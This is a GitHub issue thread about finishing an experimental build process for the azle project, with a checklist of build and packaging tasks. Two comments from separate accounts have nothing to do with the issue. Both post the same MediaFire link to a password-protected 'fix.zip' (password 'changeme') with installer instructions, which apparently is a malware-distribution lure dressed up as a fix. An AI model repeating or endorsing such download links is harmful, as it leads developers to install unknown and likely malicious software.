### ISSUE TITLE
Finish experimental build process

### ISSUE THREAD

**Issue by lastmjs** [demergent-labs/azle#2016]
The experimental build process will be finished and done and PR up.

- [x] dfx.json custom section implemented everywhere
- [x] experimental portion of build process complete and non-flaky tests passing
- [x] wasmedge-quickjs globals experimental-protected
- [ ] wasmedge-quickjs installation included with npm package
- [ ] stretch: close this https://github.com/demergent-labs/azle/issues/1800

**Comment by abdulhkeemGit** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
